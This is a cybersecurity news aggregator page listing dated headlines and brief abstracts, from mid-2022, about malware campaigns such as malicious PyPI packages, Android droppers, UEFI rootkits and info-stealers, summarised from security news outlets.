Researchers spotted a Turkish-based crypto miner malware campaign, tracked as Nitrokod, which infected systems across 11 countries. Check Point researchers discovered a Turkish based crypto miner malware campaign, dubbed Nitrokod, which infected machines...Security Affairs
August 29, 2022
Windows malware delays coinminer install by a month to evade detection Full Text
Abstract
A new malware campaign disguised as Google Translate or MP3 downloader programs was found distributing cryptocurrency mining malware across 11 countries.BleepingComputer
August 29, 2022
Malware Found In India Supreme Court Snooping Investigation Full Text
Abstract
An investigation into the alleged use of Pegasus spyware on Indian citizens identified malware on five of the 29 volunteers who submitted their devices for forensic examination.Bank Info Security
August 27, 2022
Fake ‘Cthulhu World’ P2E project used to push info-stealing malware Full Text
Abstract
Hackers have created a fake 'Cthulhu World' play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to distribute the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware infections on unsuspecting victims.BleepingComputer
August 25, 2022
Microsoft Uncovers New Post-Compromise Malware Used by Nobelium Hackers Full Text
Abstract
The threat actor behind the SolarWinds supply chain attack has been linked to yet another "highly targeted" post-exploitation malware that could be used to maintain persistent access to compromised environments. Dubbed MagicWeb by Microsoft's threat intelligence teams, the development reiterates Nobelium's commitment to developing and maintaining purpose-built capabilities. Nobelium is the tech giant's moniker for a cluster of activities that came to light with the sophisticated attack targeting SolarWinds in December 2020, and which overlaps with the Russian nation-state hacking group widely known as APT29 , Cozy Bear, or The Dukes. "Nobelium remains highly active, executing multiple campaigns in parallel targeting government organizations, non-governmental organizations (NGOs), intergovernmental organizations (IGOs), and think tanks across the US, Europe, and Central Asia," Microsoft said . MagicWeb, which shares similarities with another tThe Hacker News
August 25, 2022
Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows Full Text
Abstract
Microsoft has discovered a new malware used by the Russian hacker group APT29 (a.k.a. NOBELIUM, Cozy Bear) that enables authentication as anyone in a compromised network.BleepingComputer
August 24, 2022
Hackers Using Fake DDoS Protection Pages to Distribute Malware Full Text
Abstract
WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer. "A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware," Sucuri's Ben Martin said in a write-up published last week. Distributed denial-of-service (DDoS) protection pages are essential browser verification checks designed to deter bot-driven unwanted and malicious traffic from eating up bandwidth and taking down websites. The new attack vector involves hijacking WordPress sites to display fake DDoS protection pop-ups that, when clicked, ultimately lead to the download of a malicious ISO file ("security_install.iso") to the victim's systems. This is achieved by injecting three lines of code into a JavaScript file ("jquery.min.js"), or alternatively into the activeThe Hacker News
August 24, 2022
Fake Chrome extension ‘Internet Download Manager’ has 200,000 installs Full Text
Abstract
Google Chrome extension 'Internet Download Manager' installed by more than 200,000 users is adware. The extension has been sitting on the Chrome Web Store since at least June 2019, according to the earliest reviews posted by users.BleepingComputer
August 23, 2022
Pirated 3DMark benchmark tool delivering info-stealer malware Full Text
Abstract
Cybersecurity researchers have discovered multiple ongoing malware distribution campaigns that target internet users who seek to download copies of pirated software.BleepingComputer
August 23, 2022
XCSSET Malware Updates with Python 3 to Target macOS Monterey Users Full Text
Abstract
The operators of the XCSSET macOS malware have upped the stakes by making iterative improvements that add support for macOS Monterey by upgrading its source code components to Python 3. "The malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022," SentinelOne researchers Phil Stokes and Dinesh Devadoss said in a report. XCSSET, first documented by Trend Micro in 2020, has many moving parts that allow it to harvest sensitive information from Apple Notes, WeChat, Skype, and Telegram; inject malicious JavaScript code into various websites; and dump cookies from Safari web browser. Infection chains entail using a dropper to compromise users' Xcode projects with the backdoor, with the latter also taking steps to evade detection by masquerading as either system software or the Google Chrome web browser application. The primary executable is anThe Hacker News
August 23, 2022
Counterfeit versions of popular mobile devices target WhatsApp and WhatsApp Business Full Text
Abstract
Experts found backdoors in budget Android device models designed to target WhatsApp and WhatsApp Business messaging apps. Researchers from Doctor Web discovered backdoors in the system partition of budget Android device models that are counterfeit...Security Affairs
August 22, 2022
Researchers Find Counterfeit Phones with Backdoor to Hack WhatsApp Accounts Full Text
Abstract
Budget Android device models that are counterfeit versions associated with popular smartphone brands are harboring multiple trojans designed to target WhatsApp and WhatsApp Business messaging apps. The trojans, which Doctor Web first came across in July 2022, were discovered in the system partition of at least four different smartphones: P48pro, radmi note 8, Note30u, and Mate40, was "These incidents are united by the fact that the attacked devices were copycats of famous brand-name models," the cybersecurity firm said in a report published today. "Moreover, instead of having one of the latest OS versions installed on them with the corresponding information displayed in the device details (for example, Android 10), they had the long outdated 4.4.2 version." Specifically, the tampering concerns two files "/system/lib/libcutils.so" and "/system/lib/libmtd.so" that are modified in such a manner that when the libcutils.so system library is usThe Hacker News
August 22, 2022
Meet Borat RAT, a New Unique Triple Threat Full Text
Abstract
Atlanta-based cyber risk intelligence company, Cyble discovered a new Remote Access Trojan (RAT) malware. What makes this particular RAT malware distinct enough to be named after the comic creation of Sacha Baron Cohen ? RAT malware typically helps cybercriminals gain complete control of a victim's system, permitting them to access network resources, files, and power to toggle the mouse and keyboard. Borat RAT malware goes beyond the standard features and enables threat actors to deploy ransomware and DDoS attacks . It also increases the number of threat actors who can launch attacks, sometimes appealing to the lowest common denominator. The added functionality of carrying out DDoS attacks makes it insidious and a risk to today's digital organizations. Ransomware has been the most common top attack type for over three years . According to an IBM report, REvil was the most common ransomware strain, consisting of about 37% of all ransomware attacks. Borat RAT is a uniqueThe Hacker News
August 22, 2022
Escanor Malware delivered in Weaponized Microsoft Office Documents Full Text
Abstract
Researchers spotted a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, identified a new RAT (Remote Administration Tool)...Security Affairs
August 22, 2022
Escanor malware delivered in weaponized Microsoft Office documents Full Text
Abstract
The threat actors offer Android-based and PC-based versions of RAT, along with HVNC module and exploit builder to weaponize Microsoft Office and Adobe PDF documents to deliver malicious code.Help Net Security
August 22, 2022
Donot Team cyberespionage group updates its Windows malware framework Full Text
Abstract
The Donot Team threat actor, aka APT-C-35, has added new capabilities to its Jaca Windows malware framework. The Donot Team has been active since 2016, it focuses on government and military organizations, ministries of foreign affairs, and embassies...Security Affairs
August 22, 2022
Disk wiping malware knows no borders Full Text
Abstract
Fortinet announced the latest semiannual FortiGuard Labs Global Threat Landscape Report which revealed that ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS).Help Net Security
August 21, 2022
Grandoreiro banking malware targets Mexico and Spain Full Text
Abstract
A new Grandoreiro banking malware campaign is targeting organizations in Mexico and Spain, Zscaler reported. Zscaler ThreatLabz researchers observed a Grandoreiro banking malware campaign targeting organizations in the Spanish-speaking nations of Mexico...Security Affairs
August 19, 2022
241 npm and PyPI packages caught dropping Linux cryptominers Full Text
Abstract
More than 200 malicious packages were discovered infiltrating the PyPI and npm open source registries this week. These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.BleepingComputer
August 19, 2022
Grandoreiro banking malware targets manufacturers in Spain, Mexico Full Text
Abstract
The notorious 'Grandoreiro' banking trojan was spotted in recent attacks targeting employees of a chemicals manufacturer in Spain and workers of automotive and machinery makers in Mexico.BleepingComputer
August 18, 2022
Researchers Detail Evasive DarkTortilla Crypter Used to Deliver Malware Full Text
Abstract
A .NET-based evasive crypter named DarkTortilla has been used by threat actors to distribute a broad array of commodity malware as well as targeted payloads like Cobalt Strike and Metasploit, likely since 2015 . "It can also deliver 'add-on packages' such as additional malicious payloads, benign decoy documents, and executables," cybersecurity firm Secureworks said in a Wednesday report. "It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging." Malware delivered by the crypter includes information steakers and remote access trojans (RATs) such as Agent Tesla, AsyncRat, NanoCore, and RedLine Stealer. "DarkTortilla has versatility that similar malware does not," the researchers noted. Crypters are software tools that use a combination of encryption, obfuscation, and code manipulation of malware so as to bypass detection by security solutions. The delivery of DarkTortilThe Hacker News
August 18, 2022
Android malware apps with 2 million installs found on Google Play Full Text
Abstract
A new batch of thirty-five Android malware apps that display unwanted advertisements was found on the Google Play Store, with the apps installed over 2 million times on victims' mobile devices.BleepingComputer
August 17, 2022
Bugdrop dropper includes features to circumvent Google’s security Controls Full Text
Abstract
Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that's still under development. Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active...Security Affairs
August 17, 2022
Malicious PyPi packages turn Discord into password-stealing malware Full Text
Abstract
A dozen malicious PyPi packages have been discovered installing malware that modifies the Discord client to become an information-sealing backdoor and stealing data from web browsers and Roblox.BleepingComputer
August 17, 2022
Malware devs already bypassed Android 13’s new security feature Full Text
Abstract
Android malware developers are already adjusting their tactics to bypass a new 'Restricted settings' security feature introduced by Google in the newly released Android 13.BleepingComputer
August 17, 2022
Malicious Browser Extensions Targeted Over a Million Users So Far This Year Full Text
Abstract
More than 1.31 million users attempted to install malicious or unwanted web browser extensions at least once, new findings from cybersecurity firm Kaspersky show. "From January 2020 to June 2022, more than 4.3 million unique users were attacked by adware hiding in browser extensions, which is approximately 70% of all users affected by malicious and unwanted add-ons," the company said . As many as 1,311,557 users fall under this category in the first half of 2022, per Kaspersky's telemetry data. In comparison, the number of such users peaked in 2020 at 3,660,236, followed by 1,823,263 unique users in 2021. The most prevalent threat is a family of adware called WebSearch, which masquerade as PDF viewers and other utilities, and comes with capabilities to collect and analyze search queries and redirect users to affiliate links. WebSearch is also notable for modifying the browser's start page, which contains a search engine and a number of links to third-party sourThe Hacker News
August 16, 2022
Malicious browser extensions targeted almost 7 million people Full Text
Abstract
Almost 7 million users have attempted to install malicious browser extensions since 2020, with 70% of those extensions used as adware to target users with advertisements.BleepingComputer
August 15, 2022
SOVA Android Banking Trojan Returns With New Capabilities and Targets Full Text
Abstract
The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out. That's according to the latest findings from Italian cybersecurity firm Cleafy, which found newer versions of the malware sporting functionality to intercept two-factor authentication (2FA) codes, steal cookies, and expand its targeting to cover Australia, Brazil, China, India, the Philippines, and the U.K. SOVA, meaning Owl in Russian, came to light in September 2021 when it was observed striking financial and shopping apps from the U.S. and Spain for harvesting credentials through overlay attacks by taking advantage of Android's Accessibility services. In less than a year, the trojan has also acted as a foundation for another Android malware called MaliBot that's designed to target online banking and cryptocurrency wallet custoThe Hacker News
August 15, 2022
SOVA Android malware now also encrypts victims’ files Full Text
Abstract
Security researchers from Cleafy reported that the SOVA Android banking malware is back and is rapidly evolving. The SOVA Android banking trojan was improved, it has a new ransomware feature that encrypts files on Android devices, Cleafy researchers...Security Affairs
August 15, 2022
A new PyPI Package was found delivering fileless Linux Malware Full Text
Abstract
Security Researchers discovered a new PyPI Package designed to drop fileless cryptominer to Linux systems. Sonatype researchers have discovered a new PyPI package named 'secretslib' that drops fileless cryptominer to the memory of Linux machine systems....Security Affairs
August 14, 2022
Newly Uncovered PyPI Package Drops Fileless Cryptominer to Linux Systems Full Text
Abstract
A now-removed rogue package pushed to the official third-party software repository for Python has been found to deploy cryptominers on Linux systems. The module, named " secretslib " and downloaded 93 times prior to its deletion, was released to the Python Package Index (PyPI) on August 6, 2022 and is described as "secrets matching and verification made easy." "On a closer inspection though, the package covertly runs cryptominers on your Linux machine in-memory (directly from your RAM), a technique largely employed by fileless malware and crypters," Sonatype researcher Ax Sharma disclosed in a report last week. It achieves this by executing a Linux executable file retrieved from a remote server post installation, whose main task is to drop an ELF file (" memfd ") directly in memory that functions as a Monero cryptominer, after which it gets deleted by the "secretslib" package. "The malicious activity leaves little to nThe Hacker News
August 13, 2022
SOVA malware adds ransomware feature to encrypt Android devices Full Text
Abstract
The SOVA Android banking trojan continues to evolve with new features, code improvements, and the addition of a new ransomware feature that encrypts files on mobile devices.BleepingComputer
August 12, 2022
Chinese hackers backdoor chat app with new Linux, macOS malware Full Text
Abstract
Versions of a cross-platform instant messenger application focused on the Chinese market known as 'MiMi' have been trojanized to deliver a new backdoor (dubbed rshell) that can be used to steal data from Linux and macOS systems.BleepingComputer
August 12, 2022
Microsoft blocks UEFI bootloaders enabling Windows Secure Boot bypass Full Text
Abstract
Some signed third-party bootloaders for the Unified Extensible Firmware Interface (UEFI) used by Windows could allow attackers to execute unauthorized code in an early stage of the boot process, before the operating system loads.BleepingComputer
August 10, 2022
Experts found 10 malicious packages on PyPI used to steal developers’ data Full Text
Abstract
10 packages have been removed from the Python Package Index (PyPI) because they were found harvesting data. Check Point researchers have discovered ten malicious packages on the Python Package Index (PyPI). The packages install info-stealers that...Security Affairs
August 9, 2022
Woody RAT Targets Russian Entities Full Text
Abstract
The malware was being delivered via archive files and MS Office documents by abusing the Follina vulnerability. The malware has been active in the wild for at least a year.Cyware Alerts - Hacker News
August 09, 2022
10 Credential Stealing Python Libraries Found on PyPI Repository Full Text
Abstract
In what's yet another instance of malicious packages creeping into public code repositories, 10 modules have been removed from the Python Package Index (PyPI) for their ability to harvest critical data points such as passwords and Api tokens. The packages "install info-stealers that enable attackers to steal developer's private data and personal credentials," Israeli cybersecurity firm Check Point said in a Monday report. A short summary of the offending packages is below - Ascii2text , which downloads a nefarious script that gathers passwords stored in web browsers such as Google Chrome, Microsoft Edge, Brave, Opera, and Yandex Browser Pyg-utils, Pymocks, and PyProto2 , which are designed to steal users' AWS credentials Test-async and Zlibsrc , which download and execute malicious code during installation Free-net-vpn, Free-net-vpn2, and WINRPCexploit , which steal user credentials and environment variables, and Browserdiv , which are capable of collThe Hacker News
August 09, 2022
10 malicious PyPI packages found stealing developer’s credentials Full Text
Abstract
Threat analysts have discovered ten malicious Python packages on the PyPI repository, used to infect developer's systems with password-stealing malware.BleepingComputer
August 09, 2022
Hackers install Dracarys Android malware using modified Signal app Full Text
Abstract
Researchers have discovered more details on the newly discovered Android spyware 'Dracarys,' used by the Bitter APT group in cyberespionage operations targeting users from New Zealand, India, Pakistan, and the United Kingdom.BleepingComputer
August 5, 2022
The popularity of Dark Utilities ‘C2-as-a-Service’ rapidly increases Full Text
Abstract
Dark Utilities "C2-as-a-Service" is attracting a growing number of customers searching for a command-and-control for their campaigns. The popularity of the Dark Utilities "C2-as-a-Service" is rapidly increasing, over 3,000 users are already...Security Affairs
August 5, 2022
A Bunch of Android Apps Spread Adware and Other Malware Full Text
Abstract
Another batch of malicious apps infected with adware and malware has managed to slip past Google’s defenses and end up on the Play Store. These apps were pushing intrusive ads, subscribing users to premium services, and stealing social media accounts. Users are requested to verify apps beforehand ... Read MoreCyware Alerts - Hacker News
August 4, 2022
Microsoft links Raspberry Robin Malware to Evil Corp Attacks Full Text
Abstract
Microsoft has interlinked the operations of cybercriminals spreading Raspberry Robin and the notorious Evil Corp. Evil Corp was seen taking advantage of Raspberry Robin's DEV-0243 access to enterprise networks for distributing Dridex malware. Raspberry Robin spreads via external USB drives.Cyware Alerts - Hacker News
August 4, 2022
IcedID leverages PrivateLoader. By: Joshua Platt and Jason Reaves Full Text
Abstract
PrivateLoader is not new to having some bigger malware names leveraging it as previous research indicates it being leveraged by TrickBot, Qakbot, DanaBot, and Dridex previously.Medium
August 04, 2022
New Linux malware brute-forces SSH servers to breach networks Full Text
Abstract
A new botnet called 'RapperBot' has emerged in the wild since mid-June 2022, focusing on brute-forcing its way into Linux SSH servers and then establishing persistence.BleepingComputer
August 04, 2022
Cybersecurity agencies reveal last year’s top malware strains Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a list of the topmost detected malware strains last year in a joint advisory with the Australian Cyber Security Centre (ACSC).BleepingComputer
August 03, 2022
Cloned Atomic Wallet website is pushing Mars Stealer malware Full Text
Abstract
A fake website impersonating the official portal for the Atomic wallet, a popular decentralized wallet that also operates as a cryptocurrency exchange portal, is, in reality, distributing copies of the Mars Stealer information-stealing malware.BleepingComputer
August 03, 2022
VirusTotal Reveals Most Impersonated Software in Malware Attacks Full Text
Abstract
Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack. Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed. "One of the simplest social engineering tricks we've seen involves making a malware sample seem a legitimate program," VirusTotal said in a Tuesday report. "The icon of these programs is a critical feature used to convince victims that these programs are legitimate." It's no surprise that threat actors resort to a variety of approaches to compromise endpoints by tricking unwitting users into downloading and running seemingly innocuous executables. This, in turn, is primarily achieved by taking advantage of genuine domains in a bid to get around IP-based firewall defensesThe Hacker News
August 3, 2022
Manjusaka, a new attack tool similar to Sliver and Cobalt Strike Full Text
Abstract
Researchers spotted a Chinese threat actors using a new offensive framework called Manjusaka which is similar to Cobalt Strike. Talos researchers observed a Chinese threat actor using a new offensive framework called Manjusaka (which can be translated...Security Affairs
August 03, 2022
35,000 code repos not hacked—but clones flood GitHub to serve malware Full Text
Abstract
Thousands of GitHub repositories were forked (cloned) and altered to include malware, a software engineer discovered.BleepingComputer
August 2, 2022
Gootkit AaaS malware is still active and uses updated tactics Full Text
Abstract
Gootkit access-as-a-service (AaaS) malware is back with tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-a-as-a-service model, it is used by different groups to drop additional malicious payloads on the compromised...Security Affairs
August 1, 2022
Latest Generation of the Raccoon Stealer Family Ditches Telegram Network for Command & Control Full Text
Abstract
Raccoon is a malware family that has been sold as malware-as-a-service on underground forums since early 2019. In early July 2022, a new variant of this malware dubbed Raccoon Stealer v2 was released.Zscaler
July 31, 2022
Gootkit Loader Resurfaces with Updated Tactic to Compromise Targeted Computers Full Text
Abstract
The operators of the Gootkit access-as-a-service ( AaaS ) malware have resurfaced with updated techniques to compromise unsuspecting victims. "In the past, Gootkit used freeware installers to mask malicious files; now it uses legal documents to trick users into downloading these files," Trend Micro researchers Buddy Tancio and Jed Valderama said in a write-up last week. The findings build on a previous report from eSentire, which disclosed in January of widespread attacks aimed at employees of accounting and law firms to deploy malware on infected systems. Gootkit is part of the proliferating underground ecosystem of access brokers, who are known to provide other malicious actors a pathway into corporate networks for a price, paving the way for actual damaging attacks such as ransomware. The loader utilizes malicious search engine results, a technique called SEO poisoning , to lure unsuspecting users into visiting compromised websites hosting malware-laced ZIP pacThe Hacker News
July 31, 2022
IIS Extensions Used as Backdoors for Exchange Servers Full Text
Abstract
Microsoft warned against threat actors increasingly using malicious IIS web server extensions to backdoor unpatched Exchange servers. Between January and May, the attackers targeted several servers to access victims' email mailboxes, steal credentials and sensitive data, and run commands. IIS modul ... Read MoreCyware Alerts - Hacker News
July 31, 2022
DSIRF, Knotweed Jointly Abused Zero-day to Deploy Subzero Malware Full Text
Abstract
Microsoft connected the Knotweed threat actor to the Austrian surveillance firm DSIRF that has been targeting entities in Central America and Europe with the Subzero surveillance malware. Microsoft recommends patching the exploited flaws and confirming that Microsoft Defender is updated to det ... Read MoreCyware Alerts - Hacker News
July 31, 2022
17 Android Apps on Google Play Store, dubbed DawDropper, were serving banking malware Full Text
Abstract
The researchers discovered over a dozen Android Apps on Google Play Store, collectively dubbed DawDropper, that were dropping Banking malware. Trend Micro researchers uncovered a malicious campaign that leveraged 17 seemingly harmless Android dropper...Security Affairs
July 29, 2022
Over a Dozen Android Apps on Google Play Store Caught Dropping Banking Malware Full Text
Abstract
A malicious campaign leveraged seemingly innocuous Android dropper apps on the Google Play Store to compromise users' devices with banking malware . These 17 dropper apps, collectively dubbed DawDropper by Trend Micro, masqueraded as productivity and utility apps such as document scanners, QR code readers, VPN services, and call recorders, among others. All these apps in question have been removed from the app marketplace. "DawDropper uses Firebase Realtime Database, a third-party cloud service, to evade detection and dynamically obtain a payload download address," the researchers said . "It also hosts malicious payloads on GitHub." Droppers are apps designed to sneak past Google's Play Store security checks, following which they are used to download more potent and intrusive malware on a device, in this case, Octo (Coper), Hydra , Ermac , and TeaBot . Attack chains involved the DawDropper malware establishing connections with a Firebase ReThe Hacker News
July 29, 2022
Microsoft experts linked the Raspberry Robin malware to Evil Corp operation Full Text
Abstract
Microsoft linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation. On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via Raspberry Robin malware. Raspberry...Security Affairs
July 29, 2022
Malware-laced npm packages used to target Discord users Full Text
Abstract
Threat actors used multiple npm packages to target Discord users with malware designed to steal their payment card data. A malicious campaign targeting Discord users leverages multiple npm packages to deliver malware that steals their payment card...Security Affairs
July 28, 2022
Amadey Bot’s New Version Spreads Using Software Cracks Full Text
Abstract
Software cracks and keygen sites could be attractive but it’s extremely unsafe. A malware campaign by SmokeLoader operators was spotted dropping the Amadey Bot, a rarely used malware since 2020, via similar lures. Users should avoid downloading from unauthenticated sources and double check dom ... Read MoreCyware Alerts - Hacker News
July 28, 2022
Cyberspies use Google Chrome extension to steal emails undetected Full Text
Abstract
A North Korean-backed threat group tracked as Kimsuky is using a malicious browser extension to steal emails from Google Chrome or Microsoft Edge users reading their webmail.BleepingComputer
July 28, 2022
Malicious npm packages steal Discord users’ payment card info Full Text
Abstract
Multiple npm packages are being used in an ongoing malicious campaign to infect Discord users with malware that steals their payment card information.BleepingComputer
July 27, 2022
These 28+ Android Apps with 10 Million Downloads from the Play Store Contain Malware Full Text
Abstract
As many as 30 malicious Android apps with cumulative downloads of nearly 10 million have been found on the Google Play Store distributing adware. "All of them were built into various programs, including image-editing software, virtual keyboards, system tools and utilities, calling apps, wallpaper collection apps, and others," Dr.Web said in a Tuesday write-up. While masquerading as innocuous apps, their primary goal is to request permissions to show windows over other apps and run in the background in order to serve intrusive ads. To make it difficult for the victims to detect and uninstall the apps, the adware trojans hide their icons from the list of installed apps in the home screen or replace the icons with others that are likely to be less noticed (e.g., SIM Toolkit). Some of these apps also offer the advertised features, as observed in the case of two apps: "Water Reminder- Tracker & Reminder" and "Yoga- For Beginner to Advanced." HoweverThe Hacker News
July 27, 2022
New Ducktail Infostealer Malware Targeting Facebook Business and Ad Accounts Full Text
Abstract
Facebook business and advertising accounts are at the receiving end of an ongoing campaign dubbed Ducktail designed to seize control as part of a financially driven cybercriminal operation. "The threat actor targets individuals and employees that may have access to a Facebook Business account with an information-stealer malware," Finnish cybersecurity company WithSecure (formerly F-Secure Business) said in a new report. "The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account and ultimately hijack any Facebook Business account that the victim has sufficient access to." The attacks, attributed to a Vietnamese threat actor, are said to have begun in the latter half of 2021, with primary targets being individuals with managerial, digital marketing, digital media, and human resources roles in companies. The idea is to target employees with high-level accThe Hacker News
July 27, 2022
Microsoft: Windows, Adobe zero-days used to deploy Subzero malware Full Text
Abstract
Microsoft has linked a threat group known as Knotweed to an Austrian spyware vendor also operating as a cyber mercenary outfit named DSIRF that targets European and Central American entities using a malware toolset dubbed Subzero.BleepingComputer
July 27, 2022
Malicious IIS Extensions Gaining Popularity Among Cyber Criminals for Persistent Access Full Text
Abstract
Threat actors are increasingly abusing Internet Information Services ( IIS ) extensions to backdoor servers as a means of establishing a "durable persistence mechanism." That's according to a new warning from the Microsoft 365 Defender Research Team, which said that "IIS backdoors are also harder to detect since they mostly reside in the same directories as legitimate modules used by target applications, and they follow the same code structure as clean modules." Attack chains taking this approach commence with weaponizing a critical vulnerability in the hosted application for initial access, using this foothold to drop a script web shell as the first stage payload. This web shell then becomes the conduit for installing a rogue IIS module to provide highly covert and persistent access to the server, in addition to monitoring incoming and outgoing requests as well as running remote commands. Indeed, earlier this month, Kaspersky researchers disclosed a camThe Hacker News
July 26, 2022
Lightning Framework: Another Capable Linux Malware Full Text
Abstract
A previously undetected malware, dubbed Lightning Framework, was found targeting Linux systems. It can also serve as a backdoor for infected devices using SSH and can deploy an array of rootkits. Stay safe using a reliable anti-malware solution and let’s not skip on threat intel platforms to mitiga ... Read MoreCyware Alerts - Hacker News
July 26, 2022
Threat actors leverages DLL-SideLoading to spread Qakbot malware Full Text
Abstract
Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security expert ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that was leveraging the Windows 7 Calculator app for DLL side-loading...Security Affairs
July 26, 2022
New Android malware apps installed 10 million times from Google Play Full Text
Abstract
A new batch of malicious Android apps filled with adware and malware was found on the Google Play Store that have been installed close to 10 million times on mobile devices.BleepingComputer
July 26, 2022
GoMet Backdoor Used in Attacks Targeting Ukraine Full Text
Abstract
An uncommon piece of malware was found targeting a large software development firm in Ukraine. The malware is a moderately altered version of the open-source backdoor GoMet. Two samples of the backdoor with minor differences have been discovered, believed to have the same source code. However ... Read MoreCyware Alerts - Hacker News
July 26, 2022
SmokeLoader Infecting Targeted Systems with Amadey Info-Stealing Malware Full Text
Abstract
An information-stealing malware called Amadey is being distributed by means of another backdoor called SmokeLoader. The attacks hinge on tricking users into downloading SmokeLoader that masquerades as software cracks, paving the way for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last week. Amadey , a botnet that first appeared around October 2018 on Russian underground forums for $600, is equipped to siphon crendentials, capture screenshots, system metadata, and even information about antivirus engines and additional malware installed on an infected machine. While an update was spotted last July by Walmart Global Tech incorporated functionality for harvesting data from Mikrotik routers and Microsoft Outlook, the toolset has since been upgraded to capture information from FileZilla, Pidgin, Total Commander FTP Client, RealVNC, TightVNC, TigerVNC, and WinSCP. Its main goal, however, is to deployThe Hacker News
July 25, 2022
CosmicStrand UEFI malware found in Gigabyte, ASUS motherboards Full Text
Abstract
Chinese-speaking hackers have been using since at least 2016 malware that lies virtually undetected in the firmware images for some motherboards, one of the most persistent threats commonly known as a UEFI rootkit.BleepingComputer
July 25, 2022
Source code for Rust-based info-stealer released on hacker forums Full Text
Abstract
A malware author released the source code of their info-stealer for free on hacking forums earlier this month, and security analysts already report observing several samples being deployed in the wild.BleepingComputer
July 25, 2022
CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China Full Text
Abstract
Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed...Security Affairs
July 25, 2022
Experts Uncover New ‘CosmicStrand’ UEFI Firmware Rootkit Used by Chinese Hackers Full Text
Abstract
An unknown Chinese-speaking threat actor has been attributed to a new kind of sophisticated UEFI firmware rootkit called CosmicStrand . "The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and we noticed that all these images are related to designs using the H81 chipset," Kaspersky researchers said in a new report published today. "This suggests that a common vulnerability may exist that allowed the attackers to inject their rootkit into the firmware's image." Victims identified are said to be private individuals located in China, Vietnam, Iran, and Russia, with no discernible ties to any organization or industry vertical. The attribution to a Chinese-speaking threat actor stems from code overlaps between CosmicStrand and other malware such as the MyKings botnet and MoonBounce. Rootkits, which are malware implants that are capable of embedding themselves in the deepest layers of the operating system, are morphed from a rarity tThe Hacker News
July 25, 2022
Racoon Stealer is Back — How to Protect Your Organization Full Text
Abstract
The Racoon Stealer malware as a service platform gained notoriety several years ago for its ability to extract data that is stored within a Web browser. This data initially included passwords and cookies, which sometimes allow a recognized device to be authenticated without a password being entered. Racoon Stealer was also designed to steal auto-fill data, which can include a vast trove of personal information ranging from basic contact data to credit card numbers. As if all of that were not enough, Racoon Stealer also had the ability to steal cryptocurrency and to steal (or drop) files on an infected system. As bad as Racoon Stealer might have been, its developers have recently created a new version that is designed to be far more damaging than the version that previously existed. New Racoon Stealer Capabilities The new version of Raccoon Stealer still has the ability to steal browser passwords, cookies, and auto-fill data. It also has the ability to steal any credit card numbeThe Hacker News
July 25, 2022
Amadey malware spreads via software cracks laced with SmokeLoader Full Text
Abstract
Operators behind the Amadey Bot malware use the SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is a data-stealing malware that was first spotted in 2018, it also allows operators to install additional payloads....Security Affairs
July 24, 2022
Amadey malware pushed via software cracks in SmokeLoader campaign Full Text
Abstract
A new version of the Amadey Bot malware is distributed through the SmokeLoader malware, using software cracks and keygen sites as lures.BleepingComputer
July 21, 2022
New Linux Malware Framework Lets Attackers Install Rootkit on Targeted Systems Full Text
Abstract
A never-before-seen Linux malware has been dubbed a "Swiss Army Knife" for its modular architecture and its capability to install rootkits. This previously undetected Linux threat, called Lightning Framework by Intezer, is equipped with a plethora of features, making it one of the most intricate frameworks developed for targeting Linux systems. "The framework has both passive and active capabilities for communication with the threat actor, including opening up SSH on an infected machine, and a polymorphic malleable command and control configuration," Intezer researcher Ryan Robinson said in a new report published today. Central to the malware is a downloader ("kbioset") and a core ("kkdmflush") module, the former of which is engineered to retrieve at least seven different plugins from a remote server that are subsequently invoked by the core component. In addition, the downloader is also responsible for establishing the persistence of tThe Hacker News
July 21, 2022
Google ads lead to major malvertising campaign Full Text
Abstract
What makes this campaign stand out is the fact that it exploits a very common search behavior when it comes to navigating the web: looking up a website by name instead of entering its full URL in the address bar.Malwarebytes Labs
July 21, 2022
Lightning Framework, a previously undetected malware that targets Linux systems Full Text
Abstract
Researchers discovered a previously undetected malware dubbed 'Lightning Framework' that targets Linux systems. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. The malicious...Security Affairs
July 21, 2022
New ‘Lightning Framework’ Linux malware installs rootkits, backdoors Full Text
Abstract
A new and previously undetected malware dubbed 'Lightning Framework' targets Linux systems and can be used to backdoor infected devices using SSH and deploy multiple types of rootkits.BleepingComputer
July 21, 2022
